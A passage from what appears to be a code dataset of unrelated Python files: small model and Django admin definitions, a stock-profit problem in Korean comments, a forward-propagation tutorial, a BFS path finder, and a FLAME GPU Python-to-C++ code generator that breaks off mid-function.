class TargetRepositories(Model):
topic = TransactionTopic
rhel_repos = fields.List(fields.Model(RHELTargetRepository))
custom_repos = fields.List(fields.Model(CustomTargetRepository), default=[])
class UsedTargetRepositories(Model):
topic = TransactionTopic
repos = fields.List(fields.Model(UsedTargetRepository))
class CustomTargetRepositoryFile(Model):
topic = TransactionTopic
file = fields.String()
|
2,991 | d18c45c08face08ce8f7dad915f1896c24c95cbf | from django.contrib import admin
from main.models import Assignment, Review, Sample, Question, SampleMultipleFile
# Register your models here.
admin.site.register(Assignment)
admin.site.register(Review)
admin.site.register(Question)
class MultipleFileInline(admin.TabularInline):
model = SampleMultipleFile
class SampleAdmin(admin.ModelAdmin):
inlines = [ MultipleFileInline ]
prepopulated_fields = {'slug': ('heading',)}
admin.site.register(Sample, SampleAdmin) |
2,992 | d3f6fb612e314ee2b86f6218719ecac2cc642c59 | # 홍준이는 요즘 주식에 빠져있다. 그는 미래를 내다보는 눈이 뛰어나, 날 별로 주가를 예상하고 언제나 그게 맞아떨어진다. 매일 그는 아래 세 가지 중 한 행동을 한다.
# 1. 주식 하나를 산다.
# 2. 원하는 만큼 가지고 있는 주식을 판다.
# 3. 아무것도 안한다.
# 홍준이는 미래를 예상하는 뛰어난 안목을 가졌지만, 어떻게 해야 자신이 최대 이익을 얻을 수 있는지 모른다. 따라서 당신에게 날 별로 주식의 가격을 알려주었을 때, 최대 이익이 얼마나 되는지 계산을 해달라고 부탁했다.
# 예를 들어 날 수가 3일이고 날 별로 주가가 10, 7, 6일 때, 주가가 계속 감소하므로 최대 이익은 0이 된다. 그러나 만약 날 별로 주가가 3, 5, 9일 때는 처음 두 날에 주식을 하나씩 사고, 마지막날 다 팔아 버리면 이익이 10이 된다.
# 입력의 첫 줄에는 테스트케이스 수를 나타내는 자연수 T가 주어진다. 각 테스트케이스 별로 첫 줄에는 날의 수를 나타내는 자연수 N(2 ≤ N ≤ 1,000,000)이 주어지고, 둘째 줄에는 날 별 주가를 나타내는 N개의 자연수들이 공백으로 구분되어 순서대로 주어진다. 날 별 주가는 10,000이하다.
# 예제 입력
# 3
# 3
# 10 7 6
# 3
# 3 5 9
# 5
# 1 1 3 1 2
# 예제 출력
# 0
# 10
# 5
|
2,993 | 6a09311b5b3b876fd94ed0a9cce30e070528f22c | #manual forward propagation
#based on a course I got from Datacamp.com 'Deep Learning in Python'
#python3 ~/Documents/pyfiles/dl/forward.py
#imports
import numpy as np
#we are going to simulate a neural network forward propagation algorithm
#see the picture forwardPropagation.png for more info
#the basics are it moves from input layer, hidden layer, output layer
#input is data observed or fitted
#hidden is all the behind the scenes way the model works with inputs
#output is the target, the product of processes in the hidden layer
#say we have 2 features in the input layer for a single observation
#those features are numerical, with values 2 and 3
input_data = np.array([2,3])
#from the input layer, interactions between features are represented by nodes in the hidden layer
#the significance of each interaction is denoted by parameters called weights
#weights are directly used to scale the input data into proper significance
#after the initial layer is complete, then the nodes themselves interact with each other
#in the exact same way, each node connects with weights to a new node
#in this case it goes into the output layer after the 2 hidden nodes
#the connections for the nodes to the output have weights too
weights = {'node_0': np.array([1,1]), 'node_1': np.array([-1,1]), 'output': np.array([2,-1])}
print(weights)
#the algorithm for caculating forward propagation is as follows
#(input val1 * weight val1) + (input val2, weight val2)
node_0_val = (input_data*weights['node_0']).sum()
node_1_val = (input_data*weights['node_1']).sum()
#for simplicity, we will hold the entire hidden layer in a variable
hidden_layer_vals = np.array([node_0_val, node_1_val])
print(hidden_layer_vals)
#to calculate to output layer, it works the same way
output_val = (hidden_layer_vals*weights['output']).sum()
print(output_val)
#so here you can see for the given weights those values end up as 9 for the output.
#this is the basis of forward propagation
#output to console
'''
{'output': array([ 2, -1]), 'node_0': array([1, 1]), 'node_1': array([-1, 1])}
[5 1]
9
'''
|
2,994 | f882589729d74a910d20856d4dc02546fe316e0d | from Graph import create_random_graph
def find_accessible_vertices_backwards(graph, end_vertex):
if end_vertex not in graph.parse_vertices():
raise ValueError("The end vertex is not in the graph.")
visited = []
queue = []
next_vertex = {}
distance_to_end = {}
queue.append(end_vertex)
visited.append(end_vertex)
distance_to_end[end_vertex] = 0
while len(queue) > 0:
y = queue[0]
queue = queue[1:]
for edge in graph.parse_inbound_edges(y):
if edge.source_id not in visited:
visited.append(edge.source_id)
queue.append(edge.source_id)
distance_to_end[edge.source_id] = distance_to_end[y] + 1
next_vertex[edge.source_id] = y
return next_vertex
def find_minimum_length_path(graph, start_vertex, end_vertex):
next_vertex = find_accessible_vertices_backwards(graph, end_vertex)
if start_vertex not in next_vertex.keys():
raise ValueError("There is no path from " + str(start_vertex) + " to " + str(end_vertex))
path = [start_vertex]
last_vertex = start_vertex
reached_end = False
while not reached_end:
path.append(next_vertex[last_vertex])
last_vertex = next_vertex[last_vertex]
if path[-1] == end_vertex:
reached_end = True
return path
def main():
random_graph = create_random_graph(5, 10)
print("THE GRAPH:")
for vertex in random_graph.parse_vertices():
for edge in random_graph.parse_outbound_edges(vertex):
print(edge)
print("\n")
next_vertex = find_accessible_vertices_backwards(random_graph, 1)
print(next_vertex.keys())
print("\n")
path = find_minimum_length_path(random_graph, 1, 4)
print(path)
main() |
2,995 | 8443d208a6a6bef82240235eeadbf6f8eaf77bcb | from __future__ import print_function, unicode_literals
import sys
import ast
import os
import tokenize
import warnings
from io import StringIO
def interleave(inter, f, seq):
"""Call f on each item in seq, calling inter() in between.
"""
seq = iter(seq)
try:
f(next(seq))
except StopIteration:
pass
else:
for x in seq:
inter()
f(x)
class CodeGenException(Exception):
""" Generic exception for errors raised in code generation """
pass
class CodeGenerator:
"""Methods in this class recursively traverse an AST and
output source code for the abstract syntax; original formatting
is disregarded. """
# represents built in functions
pythonbuiltins = ["abs", "float", "int"]
# basic types
basic_arg_types = ['float', 'int']
# supported math constansts
mathconsts = {"pi": "M_PI",
"e": "M_E",
"inf": "INFINITY",
"nan": "NAN",
}
# support for most numpy types except complex numbers and float>64bit
numpytypes = {"byte": "char",
"ubyte": "unsigned char",
"short": "short",
"ushort": "unsigned short",
"intc": "int",
"uintc": "unsigned int",
"uint": "unisgned int",
"longlong": "long long",
"ulonglong": "unsigned long long",
"half": "half", # cuda supported
"single": "float",
"double": "double",
"longdouble": "long double",
"bool_": "bool",
"bool8": "bool",
# sized aliases
"int_": "long",
"int8": "int8_t",
"int16": "int16_t",
"int32": "int32_t",
"int64": "int64_t",
"intp": "intptr_t",
"uint_": "long",
"uint8": "uint8_t",
"uint16": "uint16_t",
"uint32": "uint32_t",
"uint64": "uint64_t",
"uintp": "uintptr_t",
"float_": "float",
"float16": "half",
"float32": "float",
"float64": "double"
}
# getVariableType and setVariableType functions are added dynamically
fgpu_funcs = [ "getID", "getStepCounter", "getIndex" ]
fgpu_attrs = ["ALIVE", "DEAD"]
fgpu_input_msg_funcs = ["radius", "at"] # functions that can be called on message_in that do NOT return iterators
fgpu_input_msg_iter_funcs = ["wrap", "vn", "vn_wrap"] # functions that can be called on message_in that do return iterators
fgpu_input_msg_iter_var_funcs = ["getIndex", "getVirtualX", "getVirtualY", "getVirtualZ"]
fgpu_output_msg_funcs = ["setLocation", "setKey", "setIndex"]
fgpu_agent_out_msg_funcs = ["getID"]
fgpu_env_funcs = ["containsProperty", "containsMacroProperty"]
fgpu_env_macro_funcs = ["exchange", "CAS", "min", "max"]
fgpu_rand_funcs = []
fgpu_message_types = ["pyflamegpu.MessageNone", "pyflamegpu.MessageBruteForce", "pyflamegpu.MessageBucket", "pyflamegpu.MessageSpatial2D", "pyflamegpu.MessageSpatial3D", "pyflamegpu.MessageArray", "pyflamegpu.MessageArray2D", "pyflamegpu.MessageArray3D"]
_fgpu_types = {"Float": "float",
"Double": "double",
"Int": "int",
"UInt": "unsigned int",
"Int8": "int_8",
"UInt8": "uint_8",
"Char": "char",
"UChar": "unsigned char",
"Int16": "int_16",
"UInt16": "uint_16",
"Int32": "int_32",
"UInt32": "uint_32",
"Int64": "int_64",
"UInt64": "uint_64"
}
def __init__(self, tree, file = sys.stdout):
"""CodeGenerator(tree, file=sys.stdout) -> None.
Print the source for tree to file."""
self.f = file
self.future_imports = []
self._indent = 0
# dict of locals used to determine if variable already exists in assignments
self._locals = ["pyflamegpu"]
self._device_functions = []
self._message_iterator_var = None # default
self._input_message_var = 'message_in' # default
self._output_message_var = 'message_out' # default
self.dispatch(tree)
print("", file=self.f)
self.f.flush()
def _deviceVariableFunctionName(self, tree, permitted_prefixes, allow_lengths = True):
"""
Gets the device function name by translating a typed Python version to a templated cpp version.
Python functions looks like getVariableFloatArray6 and translate to getVariable<float, 6>
This function will detect and test against a set of known types and also extract the Array length
This function returns None if the string is invalid in format but only throws an error if the format is correct but the type is invalid.
"""
cpp_func_name = ""
py_func = tree.attr
# extract function name start
for prefix in permitted_prefixes:
if py_func.startswith(prefix):
cpp_func_name = prefix
py_func = py_func[len(prefix):]
break # dont allow the else
else:
return None
# check type and lengths
if allow_lengths:
#split to get type and Array Length (This could **potentially** be looked up from the model description but current syntax is consistent with swig bindings)
type_and_length = py_func.split("Array")
if type_and_length[0] not in self._fgpu_types:
self.RaiseError(tree, f"'{type_and_length[0]}' is not a valid FLAME GPU type")
t = self._fgpu_types[type_and_length[0]]
# generate template args
if (len(type_and_length) == 1):
cpp_func_name += f"<{t}>"
elif (len(type_and_length) == 2):
cpp_func_name += f"<{t}, {type_and_length[1]}>"
else:
return None
else:
if py_func not in self._fgpu_types:
self.RaiseError(tree, f"'{py_func}' is not a valid FLAME GPU type")
t = self._fgpu_types[py_func]
cpp_func_name += f"<{t}>"
# return
return cpp_func_name
def fill(self, text = ""):
"Indent a piece of text, according to the current indentation level"
self.f.write("\n"+" "*self._indent + text)
def write(self, text):
"Append a piece of text to the current line."
self.f.write(str(text))
def enter(self):
"Print '{', and increase the indentation."
self.write("{")
self._indent += 1
def leave(self):
"Decrease the indentation level and Print '}'"
self._indent -= 1
self.fill("}")
def dispatch(self, tree):
"Dispatcher function, dispatching tree type T to method _T."
if isinstance(tree, list):
for t in tree:
self.dispatch(t)
return
meth = getattr(self, "_"+tree.__class__.__name__)
meth(tree)
def RaiseWarning(self, tree, str):
warnings.warn(f"Warning ({tree.lineno}, {tree.col_offset}): {str}")
def RaiseError(self, tree, str):
raise CodeGenException(f"Error ({tree.lineno}, {tree.col_offset}): {str}")
############### Cutsom Unparsing methods ###############
# These are special versions of the ast unparsing #
# dispatch functions. #
########################################################
def dispatchMacroEnvFunction(self, tree, tree_parent):
"""
Function will handle a getMacroEnvironment function (assuming it is correctly formatted (by checking with _deviceVariableFunctionName first))
"""
cpp_func_name = "getMacroProperty"
py_func = tree.attr
# extract type from function name
py_type = py_func[len(cpp_func_name):]
if py_type not in self._fgpu_types:
self.RaiseError(tree, f"'{py_type}' is not a valid FLAME GPU type")
# get cpp type
t = self._fgpu_types[py_type]
cpp_func_name += f"<{t}"
# mess with the parent to extract (and remove arguments so they dont end up in the argument list)
if not tree_parent.args :
self.RaiseError(tree, f" Macro environment function '{py_func}' is expected to have some arguments.")
# if more than one arg then the rest are bounds to translate
if len(tree_parent.args) > 1:
bounds = tree_parent.args[1:]
# process bounds by appending to cpp function template arguments
for i in bounds:
if isinstance(i, ast.Num): # num required for python 3.7
if not isinstance(i.n, int):
self.RaiseError(tree, f" Macro environment function argument '{i}' should be an integer value.")
cpp_func_name += f", {i.n}"
else: # all Python > 3.7
if not isinstance(i, ast.Constant):
self.RaiseError(tree, f" Macro environment function argument '{i}' should be an constant value (or Num in Python <3.8).")
if not isinstance(i.value, int):
self.RaiseError(tree, f" Macro environment function argument '{i}' should be an integer value.")
cpp_func_name += f", {i.value}"
# remove bounds from argument list (in place)
del tree_parent.args[1:]
cpp_func_name += ">"
self.write(cpp_func_name)
def dispatchFGPUFunctionArgs(self, tree):
"""
Handles arguments for a FLAME GPU function. Arguments must have syntax of `message_in: MessageInType, message_out: MessageOutType`
Type hinting is required to translate a type into a FLAME GPU Message type implementation
"""
# reset the locals variable stack
self._locals = ["pyflamegpu"]
if len(tree.args.args) != 2:
self.RaiseError(tree, "Expected two FLAME GPU function arguments (input message and output message)")
# input message
if not tree.args.args[0].annotation:
self.RaiseError(tree.args.args[0], "Message input requires a supported type annotation")
if not isinstance(tree.args.args[0].annotation, ast.Attribute):
self.RaiseError(tree.args.args[0], "Message input type annotation should be an attribute of the form pyflamegpu.MessageType")
if not isinstance(tree.args.args[0].annotation.value, ast.Name):
self.RaiseError(tree.args.args[0], "Message output type annotation should be an attribute of the form pyflamegpu.MessageType")
input_message_attr = tree.args.args[0].annotation.value.id + "." + tree.args.args[0].annotation.attr
if input_message_attr not in self.fgpu_message_types:
self.RaiseError(tree.args.args[0], "Message input type annotation not a supported message type")
self._input_message_var = tree.args.args[0].arg # store the message input variable name
self.write(f"flamegpu::{tree.args.args[0].annotation.attr}") # requires namespace
self.write(", ")
# output message
if not tree.args.args[1].annotation:
self.RaiseError(tree.args.args[1], "Message output requires a supported type annotation")
if not isinstance(tree.args.args[1].annotation, ast.Attribute):
self.RaiseError(tree.args.args[1], "Message output type annotation should be an attribute of the form pyflamegpu.MessageType")
if not isinstance(tree.args.args[1].annotation.value, ast.Name):
self.RaiseError(tree.args.args[1], "Message output type annotation should be an attribute of the form pyflamegpu.MessageType")
output_message_attr = tree.args.args[1].annotation.value.id + "." + tree.args.args[1].annotation.attr
if output_message_attr not in self.fgpu_message_types:
self.RaiseError(tree.args.args[1], "Message output type annotation not a supported message type")
self._output_message_var = tree.args.args[1].arg # store the message output variable name
self.write(f"flamegpu::{tree.args.args[1].annotation.attr}") # requires namespace
def dispatchType(self, tree):
"""
There is a limited set of types and formats of type description supported. Types can be either;
1) A python built in type of int or float, or
2) A subset of numpy types prefixed with either numpy or np. e.g. np.int16
This function translates and a catches unsupported types but does not translate a function call (i.e. cast)
"""
if isinstance(tree, ast.Name):
if tree.id not in self.basic_arg_types:
self.RaiseError(tree, "Not a supported type")
self.write(tree.id)
elif isinstance(tree, ast.Attribute):
if not isinstance(tree.value, ast.Name) :
self.RaiseError(tree, "Not a supported type")
if not (tree.value.id == "numpy" or tree.value.id == "np"):
self.RaiseError(tree, "Not a supported type")
if tree.attr not in self.numpytypes:
self.RaiseError(tree, "Not a supported numpy type")
self.write(self.numpytypes[tree.attr])
else:
self.RaiseError(tree, "Not a supported type")
def dispatchFGPUDeviceFunctionArgs(self, tree):
"""
Handles arguments for a FLAME GPU device function. Arguments must use type hinting to be translated to cpp.
"""
# reset the locals variable stack
self._locals = ["pyflamegpu"]
# input message
first = True
annotation = None
for arg in tree.args.args:
# ensure that there is a type annotation
if not arg.annotation:
self.RaiseError(arg, "Device function argument requires type annotation")
# comma if not first
if not first:
self.write(", ")
self.dispatchType(arg.annotation)
self.write(f" {arg.arg}")
# add arg to local variable stack
self._locals.append(arg.arg)
first = False
def dispatchMessageIteratorCall(self, tree):
"""
Message iterator call maybe a simple one (e.g. message_in(x, y, z)) or a call to a member (e.g. message_in.wrap())
Using this function avoid using the global call one which may accept member function calls to things that are not iterators.
"""
# simple case not a member function just an iterator with arguments
if isinstance(tree.func, ast.Name):
self.write(f"FLAMEGPU->{tree.func.id}")
if isinstance(tree.func, ast.Attribute) :
if isinstance(tree.func.value, ast.Name):
# check that the iterator is supported
if not tree.func.attr in self.fgpu_input_msg_iter_funcs:
self.RaiseError(tree, f"Message input loop iterator '{tree.func.attr}' is not supported.")
self.write(f"FLAMEGPU->{tree.func.value.id}.{tree.func.attr}")
else:
self.RaiseError(tree, "Message input loop iterator format incorrect.")
# handle function arguments
self.write("(")
self._CallArguments(tree)
self.write(")")
def dispatchMessageLoop(self, tree):
"""
This is a special case of a range based for loop in which iterator item returns a const referecne to the message.
Any user specified message value can be used.
"""
self.fill("for (const auto& ")
self.dispatch(tree.target)
self.write(" : ")
# if simple message iterator
if isinstance(tree.iter, ast.Name):
if not tree.iter.id == self._input_message_var:
self.RaiseError(t, f"Message input loop requires use of '{self._input_message_var}' as iterator.")
# write with prefix
self.write(f"FLAMEGPU->{self._input_message_var}")
# if it is a call then handle the different cases
elif isinstance(tree.iter, ast.Call):
self.dispatchMessageIteratorCall(tree.iter)
#otherwise not supported
else :
self.RaiseError(tree, f"Message input loop iterator in unsupported format")
self.write(")")
self._message_iterator_var = tree.target.id
self.enter()
self.dispatch(tree.body)
self.leave()
self._message_iterator_var = None
def dispatchMemberFunction(self, t, t_parent):
"""
A very limited set of function calls to members are supported so these are fully evaluated here.
t_parent is the Call ast object required if the argument need to be modified (i.e. in the case of macro environment properties)
Function calls permitted are;
* pyflamegpu.function - a supported function call. e.g. pyflamegpu.getVariableFloat(). This will be translated into a typed Cpp call.
* message_input.function - a call to the message input variable (the name of which is specified in the function definition)
* msg.function - a call to the message input iterator objection variable (the name of which is specified in the message function loop)
* message_output.function - a call to the message output variable (the name of which is specified in the function definition)
* pyflamegpu.environment.function - the only nested attribute type. This will be translated into a typed Cpp call.
* math.function - Any function calls from python `math` are translated to calls raw function calls. E.g. `math.sin()` becomes `sin()`
* numpy.type - Any numpy types are translated to static casts
"""
# it could be possible that the Call object has no value property e.g. a()()
if not hasattr(t, "value"):
self.RaiseError(t, f"Function call is in an unsupported format.")
# Nested member functions (e.g. x.y.z())
if isinstance(t.value, ast.Attribute):
# store some information about the source of this function call in parent as this may be useful for validation in whatever has called this function
t_parent.call_type = None
# only nested attribute type is environment
if not isinstance(t.value.value, ast.Name):
self.RaiseError(t, "Unknown or unsupported nested attribute")
# pyflamegpu.environment
if t.value.value.id == "pyflamegpu" and t.value.attr == "environment":
# check it is a supported environment function
self.write("FLAMEGPU->environment.")
if t.attr in self.fgpu_env_funcs:
# proceed
self.write(t.attr)
else:
# simple getProperty type function
if t.attr.startswith('getProperty') :
# possible getter setter type function
py_func = self._deviceVariableFunctionName(t, ["getProperty"])
if not py_func:
self.RaiseError(t, f"Function '{t.attr}' is not a supported pyflamegpu.environment property function.")
# write the getProperty type function
self.write(py_func)
t_parent.call_type = "Environment"
# need to catch case of getMacroProperty as arguments need to be translated into template parameters in cpp (and py_func can be ignored)
elif t.attr.startswith("getMacroProperty"):
# possible getter setter type function (Note: getMacroProperty only supports a subset of types but type checking is not performed. This is best left to the compiler.)
# no not permit lengths (e.g. Float4) as these will be passed as arguments
py_func = self._deviceVariableFunctionName(t, ["getMacroProperty"], allow_lengths=False)
if not py_func:
self.RaiseError(t, f"Function '{t.attr}' is not a supported pyflamegpu.environment macro property function.")
# handle case
self.dispatchMacroEnvFunction(t, t_parent)
t_parent.call_type = "MacroEnvironment"
else:
self.RaiseError(t, f"Function '{t.attr}' does not exist in pyflamegpu.environment object")
# pyflamegpu.random
elif t.value.value.id == "pyflamegpu" and t.value.attr == "random":
# check it is a supported random function
self.write("FLAMEGPU->random.")
if t.attr in self.fgpu_rand_funcs:
# proceed
self.write(t.attr)
else:
# possible getter setter type function
py_func = self._deviceVariableFunctionName(t, ["uniform", "normal", "logNormal"], allow_lengths=False)
if not py_func:
self.RaiseError(t, f"Function '{t.attr}' does not exist in pyflamegpu.random object")
# proceed
self.write(py_func)
t_parent.call_type = "Random"
elif t.value.value.id == "pyflamegpu" and t.value.attr == "agent_out":
# check it is a supported agent_out function
self.write("FLAMEGPU->agent_out.")
if t.attr in self.fgpu_agent_out_msg_funcs:
# proceed
self.write(t.attr)
else:
# possible getter setter type function
py_func = self._deviceVariableFunctionName(t, ["setVariable"])
if not py_func:
self.RaiseError(t, f"Function '{t.attr}' does not exist in pyflamegpu.agent_out object")
# proceed
self.write(py_func)
t_parent.call_type = "AgentOut"
else:
self.RaiseError(t, f"Unknown or unsupported nested attribute in {t.value.value.id}")
# Non nested member functions (e.g. x.y())
elif isinstance(t.value, ast.Name):
# pyflamegpu singleton
if t.value.id == "pyflamegpu":
# check for legit FGPU function calls
self.write("FLAMEGPU->")
if t.attr in self.fgpu_funcs:
# proceed
self.write(t.attr)
else:
# possible getter setter type function
py_func = self._deviceVariableFunctionName(t, ["getVariable", "setVariable"])
if not py_func:
self.RaiseError(t, f"Function '{t.attr}' does not exist in pyflamegpu object")
# proceed
self.write(py_func)
# message_in function using whatever variable was named in function declaration (e.g radius)
elif t.value.id == self._input_message_var:
# only process functions on message_in that are not iterators
if t.attr in self.fgpu_input_msg_funcs:
self.write(f"FLAMEGPU->{self._input_message_var}.")
self.write(t.attr)
else:
self.RaiseError(t, f"Message input variable '{self._input_message_var}' does not have a supported function '{t.attr}'")
# message input iterator arg
elif self._message_iterator_var and t.value.id == self._message_iterator_var:
self.write(f"{self._message_iterator_var}.")
# check for legit FGPU function calls and translate
if t.attr in self.fgpu_input_msg_iter_var_funcs:
# proceed
self.write(t.attr)
else:
# possible getter setter type function
py_func = self._deviceVariableFunctionName(t, ["getVariable"])
if not py_func:
self.RaiseError(t, f"Function '{t.attr}' does not exist in '{self._message_iterator_var}' message input iterable object")
# proceed
self.write(py_func)
# message output arg
elif t.value.id == self._output_message_var:
# check for legit FGPU function calls and translate
self.write("FLAMEGPU->message_out.")
if t.attr in self.fgpu_output_msg_funcs:
# proceed
self.write(t.attr)
else:
# possible getter setter type function
py_func = self._deviceVariableFunctionName(t, ["setVariable"])
if not py_func:
self.RaiseError(t, f"Function '{t.attr}' does not exist in '{self._output_message_var}' message output object")
# proceed
self.write(py_func)
# math functions (try them in raw function call format) or constants
elif t.value.id == "math":
self.write(t.attr)
# numpy types
elif t.value.id == "numpy" or t.value.id == "np":
if t.attr in self.numpytypes:
self.write(f"static_cast<{self.numpytypes[t.attr]}>")
else:
self.RaiseError(t, f"Unsupported numpy type {t.attr}")
# allow any call on any locals (too many cases to enforce without type checking)
elif t.value.id in self._locals:
self.write(f"{t.value.id}.{t.attr}")
else:
self.RaiseError(t, f"Global '{t.value.id}' identifier not supported")
# Call is a very nested situation which can occur only on macro environment properties. E.g. 'pyflamegpu.environment.getMacroPropertyInt('a').exchange(10)'
elif isinstance(t.value, ast.Call):
# handle the call by recursively calling this function to do the depth first execution of pyflamegpu.environment.getMacroPropertyInt('a')
self.dispatchMemberFunction(t.value.func, t.value)
# check that the handler was actually for macro environment
if t.value.call_type != "MacroEnvironment" :
self.RaiseError(t, f"Function call {t.attr} is not supported")
# now append the outer call by making sure the thing been called is a valid macro env function
if not t.attr in self.fgpu_env_macro_funcs:
self.RaiseError(t, f"Function {t.attr} is not a valid macro environment function")
# write inner call args
self.write("(")
self._CallArguments(t.value)
self.write(")")
# write outer function (call args will be completed by _Call)
self.write(f".{t.attr}")
else:
self.RaiseError(t, "Unsupported function call syntax")
############### Unparsing methods ######################
# There should be one method per concrete grammar type #
# Constructors should be grouped by sum type. Ideally, #
# this would follow the order in the grammar, but #
# currently doesn't. #
########################################################
def _Module(self, tree):
for stmt in tree.body:
self.dispatch(stmt)
def _Interactive(self, tree):
for stmt in tree.body:
self.dispatch(stmt)
def _Expression(self, tree):
self.dispatch(tree.body)
# stmt
def _Expr(self, tree):
"""
Same as a standard python expression but ends with semicolon
"""
# Catch odd case of multi line strings and doc strings which are Expr with a Constant string type value
if isinstance(tree.value, ast.Constant):
if isinstance(tree.value.value, str):
return
# catch special case of Python 3.7 Where doc string is a Str and not a Constant
elif isinstance(tree.value, ast.Str):
return
# otherwise treat like a normal expression
self.fill()
self.dispatch(tree.value)
self.write(";")
def _NamedExpr(self, tree):
"""
No such concept in C++. Standard assignment can be used in any location.
"""
self.write("(")
self.dispatch(tree.target)
self.write(" = ")
self.dispatch(tree.value)
self.write(")")
def _Import(self, t):
self.RaiseError(t, "Importing of modules not supported")
def _ImportFrom(self, t):
self.RaiseError(t, "Importing of modules not supported")
def _Assign(self, t):
"""
Assignment will use the auto type to define a variable at first use else will perform standard assignment.
Note: There is no ability to create `const` variables unless this is inferred from the assignment expression.
Multiple assignment is supported by cpp but not in the translator neither is assignment to complex expressions which are valid python syntax.
"""
if len(t.targets) > 1:
self.RaiseError(t, "Assignment to multiple targets not supported")
if not isinstance(t.targets[0], ast.Name):
self.RaiseError(t, "Assignment to complex expressions not supported")
self.fill()
# check if target exists in locals
if t.targets[0].id not in self._locals :
self.write("auto ")
self._locals.append(t.targets[0].id)
self.dispatch(t.targets[0])
self.write(" = ")
self.dispatch(t.value)
self.write(";")
def _AugAssign(self, t):
"""
Similar to assignment in terms of restrictions. E.g. Allow only single named variable assignments.
Also requires the named variable to already exist in scope.
"""
if not isinstance(t.target, ast.Name):
self.RaiseError(t, "Augmented assignment to complex expressions not supported")
# check if target exists in locals
if t.target.id not in self._locals :
self.RaiseError(t, "Augmented assignment not permitted on variables not already assigned previously")
self.fill()
self.dispatch(t.target)
self.write(" "+self.binop[t.op.__class__.__name__]+"= ")
self.dispatch(t.value)
self.write(";")
def _AnnAssign(self, t):
if not isinstance(t.target, ast.Name):
self.RaiseError(t, "Augmented assignment to complex expressions not supported")
self.fill()
self.dispatchType(t.annotation)
self.write(" ")
self.dispatch(t.target)
if t.value:
self.write(" = ")
self.dispatch(t.value)
self.write(";")
def _Return(self, t):
"""
Standard cpp like return with semicolon.
"""
self.fill("return")
if t.value:
self.write(" ")
self.dispatch(t.value)
self.write(";")
def _Pass(self, t):
self.fill(";")
def _Break(self, t):
self.fill("break;")
def _Continue(self, t):
self.fill("continue;")
def _Delete(self, t):
self.RaiseError(t, "Deletion not supported")
def _Assert(self, t):
"""
cassert does exist but probably not required in FGPU functions and unclear if supported by jitfy
"""
self.RaiseError(t, "Assert not supported")
def _Exec(self, t):
self.RaiseError(t, "Exec not supported")
def _Print(self, t):
"""
This is old school python printing so no need to support
"""
self.RaiseError(t, "Print not supported")
def _Global(self, t):
self.RaiseError(t, "Use of 'global' not supported")
def _Nonlocal(self, t):
self.RaiseError(t, "Use of 'nonlocal' not supported")
def _Await(self, t):
self.RaiseError(t, "Await not supported")
def _Yield(self, t):
self.RaiseError(t, "Yield not supported")
def _YieldFrom(self, t):
self.RaiseError(t, "Yield from not supported")
def _Raise(self, t):
"""
Exceptions are obviously supported in cpp but not in CUDA device code
"""
self.RaiseError(t, "Exception raising not supported")
def _Try(self, t):
self.RaiseError(t, "Exceptions not supported")
def _TryExcept(self, t):
self.RaiseError(t, "Exceptions not supported")
def _TryFinally(self, t):
self.RaiseError(t, "Exceptions not supported")
def _ExceptHandler(self, t):
self.RaiseError(t, "Exceptions not supported")
def _ClassDef(self, t):
self.RaiseError(t, "Class definitions not supported")
def _FunctionDef(self, t):
"""
Checks the decorators of the function definition much must be either 'pyflamegpu.agent_function', 'pyflamegpu.agent_function_condition' or 'pyflamegpu.device_function'.
Each is then processed in a different way using a specific dispatcher.
Function calls are actually checked and only permitted (or user defined) function calls are supported.
"""
self.write("\n")
# check decorators
if len(t.decorator_list) != 1 or not isinstance(t.decorator_list[0], ast.Attribute):
self.RaiseError(t, "Function definitions require a single pyflamegpu decorator of either 'pyflamegpu.agent_function', 'pyflamegpu.agent_function_condition' or 'pyflamegpu.device_function'")
# FLAMEGPU_AGENT_FUNCTION
if t.decorator_list[0].attr == 'agent_function' and t.decorator_list[0].value.id == 'pyflamegpu':
if getattr(t, "returns", False):
self.RaiseWarning(t, "Function definition return type not supported on 'pyflamegpu.agent_function'")
self.fill(f"FLAMEGPU_AGENT_FUNCTION({t.name}, ")
self.dispatchFGPUFunctionArgs(t)
self.write(")")
# FLAMEGPU_DEVICE_FUNCTION
elif t.decorator_list[0].attr == 'device_function' and t.decorator_list[0].value.id == 'pyflamegpu':
self.fill(f"FLAMEGPU_DEVICE_FUNCTION ")
if t.returns:
self.dispatchType(t.returns)
else:
self.write("void")
self.write(f" {t.name}(")
self.dispatchFGPUDeviceFunctionArgs(t)
self.write(")")
# add to list of defined functions that can be called
self._device_functions.append(t.name)
# FLAMEGPU_DEVICE_FUNCTION
elif t.decorator_list[0].attr == 'agent_function_condition' and t.decorator_list[0].value.id == 'pyflamegpu':
# check for return annotation
if not hasattr(t, "returns"):
self.RaiseError(t, "Agent function conditions must have a 'bool' return type specified as a return type annotation")
# check for return annotation type
if not isinstance(t.returns, ast.Name):
self.RaiseError(t, "Agent function conditions return type must be 'bool'")
if t.returns.id is not 'bool':
self.RaiseError(t, "Agent function conditions return type must be 'bool'")
# check to ensure no arguments (discard any with a warning)
if t.args.args:
self.RaiseWarning(t, "Agent function conditions does not support arguments. These will be discarded.")
# write the agent function macro
self.fill(f"FLAMEGPU_AGENT_FUNCTION_CONDITION({t.name})")
else:
self.RaiseError(t, "Function definition uses an unsupported decorator. Must use either 'pyflamegpu.agent_function', 'pyflamegpu.agent_function_condition' or 'pyflamegpu.device_function'")
self.enter()
self.dispatch(t.body)
self.leave()
def _AsyncFunctionDef(self, t):
self.RaiseError(t, "Async functions not supported")
def _For(self, t):
"""
Two type for for loop are supported. Either;
1) Message for loop in which case the format requires a iterator using the named pyflamegpu function argument of 'message_in'
2) A range based for loop with 1 to 3 arguments which is converted into a c style loop
"""
# if message loop then process differently
if isinstance(t.iter, ast.Name):
if t.iter.id == self._input_message_var:
self.dispatchMessageLoop(t)
else:
self.RaiseError(t, "Range based for loops only support message iteration using 'message_in' iterator")
# do not support for else
elif t.orelse:
self.RaiseError(t, "For else not supported")
# allow calls but only to range function
elif isinstance(t.iter, ast.Call):
# simple function call e.g. message_in() or range()
if isinstance(t.iter.func, ast.Name):
# catch case of message_input with arguments (e.g. spatial messaging)
if t.iter.func.id == self._input_message_var:
self.dispatchMessageLoop(t)
# otherwise permit only range based for loops
elif t.iter.func.id == "range":
# switch on different uses of range based on number of arguments
if len(t.iter.args) == 1:
self.fill(f"for (int ")
self.dispatch(t.target)
self.write("=0;")
self.dispatch(t.target)
self.write("<")
self.dispatch(t.iter.args[0])
self.write(";")
self.dispatch(t.target)
self.write("++)")
elif len(t.iter.args) == 2:
self.fill(f"for (int ")
self.dispatch(t.target)
self.write("=")
